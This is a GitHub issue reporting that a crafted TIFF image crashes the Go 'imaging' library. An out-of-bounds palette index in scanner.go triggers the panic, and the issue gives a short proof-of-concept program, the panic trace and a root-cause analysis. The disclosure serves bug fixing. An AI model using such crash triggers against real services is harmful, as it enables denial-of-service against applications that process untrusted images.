You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
When we use the imaging library to parse a maliciously constructed graph, the scan function of the scanner.go file will have an index out of bounds problem. The verification procedure is as follows:
❯ go run poc.go
panic: runtime error: index out of range [70] with length 65
goroutine 3 [running]:
github.com/disintegration/imaging.(*scanner).scan(0x1400002a040, 0x0, 0x0, 0x96, 0x1, {0x140000f0000, 0x0?, 0xf168})
/Users/**/go/pkg/mod/github.com/disintegration/[email protected]/scanner.go:242 +0x3a4
github.com/disintegration/imaging.Grayscale.func1(0x0?)
/Users/**/go/pkg/mod/github.com/disintegration/[email protected]/adjust.go:16 +0xa0
github.com/disintegration/imaging.parallel.func1()
/Users/**/go/pkg/mod/github.com/disintegration/[email protected]/utils.go:33 +0x5c
created by github.com/disintegration/imaging.parallel
/Users/**/go/pkg/mod/github.com/disintegration/[email protected]/utils.go:31 +0xcc
exit status 2
specific reason
The specific statement that causes the program panic is in line 242 of scanner.go: c := s.palette[img.Pix[i]]. When processing this picture, len(img.Palette) is only 65, but img.Pix[i] is indexed to 70 from the beginning, causing an out-of-bounds:
package main
import (
"fmt"
"image"
"os"
"runtime"
"github.com/disintegration/imaging"
)
func main() {
runtime.GOMAXPROCS(1)
file, _ := os.Open("poc.tiff")
src, _, err := image.Decode(file)
if err != nil {
return
}
if img, ok := src.(*image.Paletted); ok {
fmt.Println(len(img.Palette))
}
imaging.Grayscale(src)
}
> go run .\main.go
65
panic: runtime error: index out of range [70] with length 65
The text was updated successfully, but these errors were encountered:
pic4xiu
changed the title
Maliciously constructed images will cause the scanner.go file index to go out of bounds
Specific image will cause the index of the scan function in scanner.go to go out of bounds
Jul 15, 2023
When we use the imaging library to parse a maliciously constructed graph, the
scan
function of thescanner.go
file will have an index out of bounds problem. The verification procedure is as follows:the
poc.tiff
is here:https://github.com/pic4xiu/pocRep/blob/main/poc.tiffwhat happened
specific reason
The specific statement that causes the program panic is in line 242 of scanner.go:
c := s.palette[img.Pix[i]]
. When processing this picture,len(img.Palette)
is only 65, butimg.Pix[i]
is indexed to 70 from the beginning, causing an out-of-bounds:The text was updated successfully, but these errors were encountered: